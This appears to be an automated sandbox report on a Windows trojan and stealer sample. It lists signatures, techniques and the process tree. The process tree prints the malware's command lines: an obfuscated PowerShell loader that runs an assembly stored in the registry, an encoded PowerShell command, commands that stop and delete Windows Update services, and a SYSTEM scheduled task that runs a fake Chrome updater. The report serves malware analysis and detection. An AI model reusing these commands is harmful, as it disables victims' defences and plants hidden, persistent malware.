c500fecde8b41e100ed5bcfdaf6b6047e4e1958e69c693869772147316bea289

Analysis

max time kernel
150s
max time network
47s
platform
windows7_x64
resource
win7-20220718-en
resource tags

arch:x64arch:x86image:win7-20220718-enlocale:en-usos:windows7-x64system
submitted
25-07-2022 07:25

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

c500fecde8b41e100ed5bcfdaf6b6047e4e1958e69c693869772147316bea289.exe
Size

7.2MB
MD5

ba37036e2cdabffac8104c8bb68a697c
SHA1

9e90bc0443ef5a309717fdf3ffb73b732f59bd9b
SHA256

c500fecde8b41e100ed5bcfdaf6b6047e4e1958e69c693869772147316bea289
SHA512

4ea81b2afce1f841d4c391027a2a56de18dd40705a52a3c0cd75099017254aeb300391f5f2d57f3f706ea73bebe8f8962b699b17894f9b53d0fa725e65c2567f

Score

10^/10

discovery evasion exploit spyware stealer suricata upx

Malware Config

Signatures

Modifies security service 2 TTPs 2 IoCs

evasion

Modify Registry

T1112

Modify Existing Service

T1031

Processes:

reg.exe

description	ioc	process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Parameters	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Security	reg.exe

Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs

Processes:

powershell.EXEpowershell.EXE

description pid process target process

PID 984 created 416 984 powershell.EXE winlogon.exe
PID 632 created 416 632 powershell.EXE winlogon.exe
suricata: ET MALWARE Trojan Generic - POST To gate.php with no referer
suricata: ET MALWARE Trojan Generic - POST To gate.php with no referer
suricata
Executes dropped EXE 3 IoCs

Processes:

DcMicrosoft.exeDsMicrosoft_Launcher.exeDcMicrosoft_Launcher.exe

pid process

1064 DcMicrosoft.exe
1904 DsMicrosoft_Launcher.exe
1368 DcMicrosoft_Launcher.exe
Possible privilege escalation attempt 2 IoCs
exploit

Processes:

takeown.exeicacls.exe

pid process

1996 takeown.exe
1952 icacls.exe
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

description	pid	process	target process
PID 984 created 416	984	powershell.EXE	winlogon.exe
PID 632 created 416	632	powershell.EXE	winlogon.exe

pid	process
1064	DcMicrosoft.exe
1904	DsMicrosoft_Launcher.exe
1368	DcMicrosoft_Launcher.exe

pid	process
1996	takeown.exe
1952	icacls.exe

UPX packed file 4 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
\Users\Admin\AppData\Local\Temp\RarSFX0\DsMicrosoft_Launcher.exe	upx
C:\Users\Admin\AppData\Local\Temp\RarSFX0\DsMicrosoft_Launcher.exe	upx
behavioral1/memory/1904-65-0x000000013F340000-0x000000013FA9A000-memory.dmp	upx
behavioral1/memory/1904-66-0x000000013F340000-0x000000013FA9A000-memory.dmp	upx

Loads dropped DLL 2 IoCs

Processes:

DcMicrosoft.exe

pid process

1064 DcMicrosoft.exe
1064 DcMicrosoft.exe
Modifies file permissions 1 TTPs 2 IoCs
discovery

File Permissions Modification
T1222

Processes:

icacls.exetakeown.exe

pid process

1952 icacls.exe
1996 takeown.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

pid	process
1064	DcMicrosoft.exe
1064	DcMicrosoft.exe

pid	process
1952	icacls.exe
1996	takeown.exe

Drops file in System32 directory 3 IoCs

Processes:

powershell.EXEpowershell.EXEpowershell.exe

description	ioc	process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File opened for modification	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Suspicious use of SetThreadContext 3 IoCs

Processes:

DcMicrosoft_Launcher.exepowershell.EXEpowershell.EXE

description	pid	process	target process
PID 1368 set thread context of 1772	1368	DcMicrosoft_Launcher.exe	conhost.exe
PID 984 set thread context of 2008	984	powershell.EXE	dllhost.exe
PID 632 set thread context of 960	632	powershell.EXE	dllhost.exe

Drops file in Program Files directory 2 IoCs

Processes:

DcMicrosoft_Launcher.exe

description	ioc	process
File created	C:\Program Files\Google\Chrome\updater.exe	DcMicrosoft_Launcher.exe
File opened for modification	C:\Program Files\Google\Chrome\updater.exe	DcMicrosoft_Launcher.exe

Drops file in Windows directory 7 IoCs

Processes:

conhost.exesvchost.exe

description	ioc	process
File opened for modification	C:\Windows\Tasks\dialersvc32.job	conhost.exe
File created	C:\Windows\Tasks\dialersvc64.job	conhost.exe
File opened for modification	C:\Windows\Tasks\dialersvc64.job	conhost.exe
File opened for modification	C:\Windows\appcompat\programs\RecentFileCache.bcf	svchost.exe
File opened for modification	C:\Windows\Tasks\dialersvc64.job	svchost.exe
File opened for modification	C:\Windows\Tasks\dialersvc32.job	svchost.exe
File created	C:\Windows\Tasks\dialersvc32.job	conhost.exe

Launches sc.exe 5 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exe

pid process

572 sc.exe
1068 sc.exe
1624 sc.exe
1548 sc.exe
1812 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

976 schtasks.exe
GoLang User-Agent 1 IoCs
Uses default user-agent string defined by GoLang HTTP packages.

Processes:

description flow ioc

HTTP User-Agent header 3 Go-http-client/1.1

pid	process
572	sc.exe
1068	sc.exe
1624	sc.exe
1548	sc.exe
1812	sc.exe

pid	process
976	schtasks.exe

description	flow	ioc
HTTP User-Agent header	3	Go-http-client/1.1

Modifies data under HKEY_USERS 2 IoCs

Processes:

powershell.EXE

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage	powershell.EXE
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 5014677f08a0d801	powershell.EXE

Modifies registry key 1 TTPs 9 IoCs

Modify Registry
T1112

Processes:

reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exe

pid process

748 reg.exe
1524 reg.exe
1616 reg.exe
1700 reg.exe
1588 reg.exe
1552 reg.exe
1164 reg.exe
1972 reg.exe
1660 reg.exe

pid	process
748	reg.exe
1524	reg.exe
1616	reg.exe
1700	reg.exe
1588	reg.exe
1552	reg.exe
1164	reg.exe
1972	reg.exe
1660	reg.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exeDcMicrosoft_Launcher.exepowershell.EXEpowershell.EXEdllhost.exedllhost.exe

pid	process
1076	powershell.exe
1368	DcMicrosoft_Launcher.exe
984	powershell.EXE
632	powershell.EXE
984	powershell.EXE
2008	dllhost.exe
2008	dllhost.exe
2008	dllhost.exe
2008	dllhost.exe
632	powershell.EXE
2008	dllhost.exe
2008	dllhost.exe
960	dllhost.exe
960	dllhost.exe
960	dllhost.exe
960	dllhost.exe
2008	dllhost.exe
2008	dllhost.exe
960	dllhost.exe
960	dllhost.exe
2008	dllhost.exe
2008	dllhost.exe
960	dllhost.exe
960	dllhost.exe
2008	dllhost.exe
2008	dllhost.exe
960	dllhost.exe
960	dllhost.exe
2008	dllhost.exe
2008	dllhost.exe
960	dllhost.exe
960	dllhost.exe
2008	dllhost.exe
2008	dllhost.exe
960	dllhost.exe
960	dllhost.exe
2008	dllhost.exe
2008	dllhost.exe
960	dllhost.exe
960	dllhost.exe
2008	dllhost.exe
2008	dllhost.exe
960	dllhost.exe
960	dllhost.exe
2008	dllhost.exe
2008	dllhost.exe
960	dllhost.exe
960	dllhost.exe
2008	dllhost.exe
2008	dllhost.exe
960	dllhost.exe
960	dllhost.exe
2008	dllhost.exe
2008	dllhost.exe
960	dllhost.exe
960	dllhost.exe
2008	dllhost.exe
2008	dllhost.exe
960	dllhost.exe
960	dllhost.exe
2008	dllhost.exe
2008	dllhost.exe
960	dllhost.exe
960	dllhost.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

Explorer.EXE

pid process

1428 Explorer.EXE

pid	process
1428	Explorer.EXE

Suspicious use of AdjustPrivilegeToken 14 IoCs

Processes:

powershell.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exetakeown.exeDcMicrosoft_Launcher.exepowershell.EXEpowershell.EXEdllhost.exedllhost.exesvchost.exe

description	pid	process
Token: SeDebugPrivilege	1076	powershell.exe
Token: SeShutdownPrivilege	684	powercfg.exe
Token: SeShutdownPrivilege	1164	powercfg.exe
Token: SeShutdownPrivilege	1168	powercfg.exe
Token: SeShutdownPrivilege	1728	powercfg.exe
Token: SeTakeOwnershipPrivilege	1996	takeown.exe
Token: SeDebugPrivilege	1368	DcMicrosoft_Launcher.exe
Token: SeDebugPrivilege	984	powershell.EXE
Token: SeDebugPrivilege	632	powershell.EXE
Token: SeDebugPrivilege	984	powershell.EXE
Token: SeDebugPrivilege	2008	dllhost.exe
Token: SeDebugPrivilege	632	powershell.EXE
Token: SeDebugPrivilege	960	dllhost.exe
Token: SeAuditPrivilege	868	svchost.exe

Suspicious use of UnmapMainImage 1 IoCs

Processes:

svchost.exe

pid process

868 svchost.exe

pid	process
868	svchost.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

c500fecde8b41e100ed5bcfdaf6b6047e4e1958e69c693869772147316bea289.execmd.exeDcMicrosoft.exeDcMicrosoft_Launcher.execmd.execmd.exe

description	pid	process	target process
PID 308 wrote to memory of 240	308	c500fecde8b41e100ed5bcfdaf6b6047e4e1958e69c693869772147316bea289.exe	cmd.exe
PID 308 wrote to memory of 240	308	c500fecde8b41e100ed5bcfdaf6b6047e4e1958e69c693869772147316bea289.exe	cmd.exe
PID 308 wrote to memory of 240	308	c500fecde8b41e100ed5bcfdaf6b6047e4e1958e69c693869772147316bea289.exe	cmd.exe
PID 308 wrote to memory of 240	308	c500fecde8b41e100ed5bcfdaf6b6047e4e1958e69c693869772147316bea289.exe	cmd.exe
PID 240 wrote to memory of 1064	240	cmd.exe	DcMicrosoft.exe
PID 240 wrote to memory of 1064	240	cmd.exe	DcMicrosoft.exe
PID 240 wrote to memory of 1064	240	cmd.exe	DcMicrosoft.exe
PID 240 wrote to memory of 1064	240	cmd.exe	DcMicrosoft.exe
PID 1064 wrote to memory of 1904	1064	DcMicrosoft.exe	DsMicrosoft_Launcher.exe
PID 1064 wrote to memory of 1904	1064	DcMicrosoft.exe	DsMicrosoft_Launcher.exe
PID 1064 wrote to memory of 1904	1064	DcMicrosoft.exe	DsMicrosoft_Launcher.exe
PID 1064 wrote to memory of 1904	1064	DcMicrosoft.exe	DsMicrosoft_Launcher.exe
PID 1064 wrote to memory of 1368	1064	DcMicrosoft.exe	DcMicrosoft_Launcher.exe
PID 1064 wrote to memory of 1368	1064	DcMicrosoft.exe	DcMicrosoft_Launcher.exe
PID 1064 wrote to memory of 1368	1064	DcMicrosoft.exe	DcMicrosoft_Launcher.exe
PID 1064 wrote to memory of 1368	1064	DcMicrosoft.exe	DcMicrosoft_Launcher.exe
PID 1368 wrote to memory of 1076	1368	DcMicrosoft_Launcher.exe	powershell.exe
PID 1368 wrote to memory of 1076	1368	DcMicrosoft_Launcher.exe	powershell.exe
PID 1368 wrote to memory of 1076	1368	DcMicrosoft_Launcher.exe	powershell.exe
PID 1368 wrote to memory of 268	1368	DcMicrosoft_Launcher.exe	cmd.exe
PID 1368 wrote to memory of 268	1368	DcMicrosoft_Launcher.exe	cmd.exe
PID 1368 wrote to memory of 268	1368	DcMicrosoft_Launcher.exe	cmd.exe
PID 1368 wrote to memory of 848	1368	DcMicrosoft_Launcher.exe	cmd.exe
PID 1368 wrote to memory of 848	1368	DcMicrosoft_Launcher.exe	cmd.exe
PID 1368 wrote to memory of 848	1368	DcMicrosoft_Launcher.exe	cmd.exe
PID 268 wrote to memory of 1548	268	cmd.exe	sc.exe
PID 268 wrote to memory of 1548	268	cmd.exe	sc.exe
PID 268 wrote to memory of 1548	268	cmd.exe	sc.exe
PID 848 wrote to memory of 684	848	cmd.exe	powercfg.exe
PID 848 wrote to memory of 684	848	cmd.exe	powercfg.exe
PID 848 wrote to memory of 684	848	cmd.exe	powercfg.exe
PID 268 wrote to memory of 1812	268	cmd.exe	sc.exe
PID 268 wrote to memory of 1812	268	cmd.exe	sc.exe
PID 268 wrote to memory of 1812	268	cmd.exe	sc.exe
PID 268 wrote to memory of 572	268	cmd.exe	sc.exe
PID 268 wrote to memory of 572	268	cmd.exe	sc.exe
PID 268 wrote to memory of 572	268	cmd.exe	sc.exe
PID 268 wrote to memory of 1068	268	cmd.exe	sc.exe
PID 268 wrote to memory of 1068	268	cmd.exe	sc.exe
PID 268 wrote to memory of 1068	268	cmd.exe	sc.exe
PID 848 wrote to memory of 1164	848	cmd.exe	powercfg.exe
PID 848 wrote to memory of 1164	848	cmd.exe	powercfg.exe
PID 848 wrote to memory of 1164	848	cmd.exe	powercfg.exe
PID 268 wrote to memory of 1624	268	cmd.exe	sc.exe
PID 268 wrote to memory of 1624	268	cmd.exe	sc.exe
PID 268 wrote to memory of 1624	268	cmd.exe	sc.exe
PID 848 wrote to memory of 1168	848	cmd.exe	powercfg.exe
PID 848 wrote to memory of 1168	848	cmd.exe	powercfg.exe
PID 848 wrote to memory of 1168	848	cmd.exe	powercfg.exe
PID 268 wrote to memory of 748	268	cmd.exe	reg.exe
PID 268 wrote to memory of 748	268	cmd.exe	reg.exe
PID 268 wrote to memory of 748	268	cmd.exe	reg.exe
PID 268 wrote to memory of 1524	268	cmd.exe	reg.exe
PID 268 wrote to memory of 1524	268	cmd.exe	reg.exe
PID 268 wrote to memory of 1524	268	cmd.exe	reg.exe
PID 848 wrote to memory of 1728	848	cmd.exe	powercfg.exe
PID 848 wrote to memory of 1728	848	cmd.exe	powercfg.exe
PID 848 wrote to memory of 1728	848	cmd.exe	powercfg.exe
PID 268 wrote to memory of 1616	268	cmd.exe	reg.exe
PID 268 wrote to memory of 1616	268	cmd.exe	reg.exe
PID 268 wrote to memory of 1616	268	cmd.exe	reg.exe
PID 268 wrote to memory of 1700	268	cmd.exe	reg.exe
PID 268 wrote to memory of 1700	268	cmd.exe	reg.exe
PID 268 wrote to memory of 1700	268	cmd.exe	reg.exe

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:472

C:\Windows\system32\services.exe
C:\Windows\system32\services.exe
1⤵
PID:464

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch
2⤵
PID:596

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
2⤵
PID:272

C:\Windows\system32\sppsvc.exe
C:\Windows\system32\sppsvc.exe
2⤵
PID:1596

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
2⤵
PID:1556

C:\Windows\system32\taskhost.exe
"taskhost.exe"
2⤵
PID:1300

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
2⤵
PID:1032

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService
2⤵
PID:340

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs
2⤵
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of UnmapMainImage
PID:868

C:\Windows\system32\taskeng.exe
taskeng.exe {F9223919-7DAE-4723-9D51-5DC7A98887A6} S-1-5-18:NT AUTHORITY\System:Service:
3⤵
PID:1956

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"
4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:984

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"
4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:632

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService
2⤵
PID:840

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
2⤵
PID:804

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
2⤵
PID:756

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k RPCSS
2⤵
PID:672

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:416

C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{9a00f690-87bf-48d1-b6b7-2dced0a58029}
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2008

C:\Windows\SysWOW64\dllhost.exe
C:\Windows\SysWOW64\dllhost.exe /Processid:{e7c21efd-f02e-4b9b-83ad-dcbdf70eb0ee}
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:960

\\?\C:\Windows\system32\wbem\WMIADAP.EXE
wmiadap.exe /F /T /R
1⤵
PID:1228

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious behavior: GetForegroundWindowSpam
PID:1428

C:\Users\Admin\AppData\Local\Temp\c500fecde8b41e100ed5bcfdaf6b6047e4e1958e69c693869772147316bea289.exe
"C:\Users\Admin\AppData\Local\Temp\c500fecde8b41e100ed5bcfdaf6b6047e4e1958e69c693869772147316bea289.exe"
2⤵
- Suspicious use of WriteProcessMemory
PID:308

C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\builder.bat" "
3⤵
- Suspicious use of WriteProcessMemory
PID:240

C:\DcMicrosoft.exe
DcMicrosoft.exe -pDEC2231Q -dC:/
4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1064

C:\Users\Admin\AppData\Local\Temp\RarSFX0\DsMicrosoft_Launcher.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX0\DsMicrosoft_Launcher.exe"
5⤵
- Executes dropped EXE
PID:1904

C:\Users\Admin\AppData\Local\Temp\RarSFX0\DcMicrosoft_Launcher.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX0\DcMicrosoft_Launcher.exe"
5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1368

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHoAbgAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGoAaAByACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAG8AcwBlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGkAZgB6AG0AIwA+AA=="
6⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1076

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
6⤵
- Suspicious use of WriteProcessMemory
PID:268

C:\Windows\system32\sc.exe
sc stop UsoSvc
7⤵
- Launches sc.exe
PID:1548

C:\Windows\system32\sc.exe
sc stop WaaSMedicSvc
7⤵
- Launches sc.exe
PID:1812

C:\Windows\system32\sc.exe
sc stop wuauserv
7⤵
- Launches sc.exe
PID:572

C:\Windows\system32\sc.exe
sc stop bits
7⤵
- Launches sc.exe
PID:1068

C:\Windows\system32\sc.exe
sc stop dosvc
7⤵
- Launches sc.exe
PID:1624

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
7⤵
- Modifies registry key
PID:748

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
7⤵
- Modifies registry key
PID:1524

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
7⤵
- Modifies security service
- Modifies registry key
PID:1616

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
7⤵
- Modifies registry key
PID:1700

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
7⤵
- Modifies registry key
PID:1588

C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\WaaSMedicSvc.dll
7⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1996

C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
7⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1952

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
7⤵
- Modifies registry key
PID:1552

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
7⤵
- Modifies registry key
PID:1164

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
7⤵
- Modifies registry key
PID:1972

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
7⤵
- Modifies registry key
PID:1660

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
7⤵
PID:748

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
7⤵
PID:1168

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
7⤵
PID:1612

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
7⤵
PID:1704

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
7⤵
PID:928

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
7⤵
PID:1088

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
7⤵
PID:1732

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
6⤵
- Suspicious use of WriteProcessMemory
PID:848

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
7⤵
- Suspicious use of AdjustPrivilegeToken
PID:684

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
7⤵
- Suspicious use of AdjustPrivilegeToken
PID:1164

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-ac 0
7⤵
- Suspicious use of AdjustPrivilegeToken
PID:1168

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-dc 0
7⤵
- Suspicious use of AdjustPrivilegeToken
PID:1728

C:\Windows\System32\conhost.exe
C:\Windows\System32\conhost.exe
6⤵
- Drops file in Windows directory
PID:1772

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "\"C:\Program Files\Google\Chrome\updater.exe\""
6⤵
PID:956

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "\"C:\Program Files\Google\Chrome\updater.exe\""
7⤵
- Creates scheduled task(s)
PID:976

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /run /tn "GoogleUpdateTaskMachineQC"
6⤵
PID:316

C:\Windows\system32\schtasks.exe
schtasks /run /tn "GoogleUpdateTaskMachineQC"
7⤵
PID:1484

C:\Windows\system32\Dwm.exe
"C:\Windows\system32\Dwm.exe"
1⤵
PID:1392

C:\Windows\system32\lsm.exe
C:\Windows\system32\lsm.exe
1⤵
PID:484

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-3909934172045655756-13495505071134619268-1096944657-17664520312202005731883450522"
1⤵
PID:1148

Network

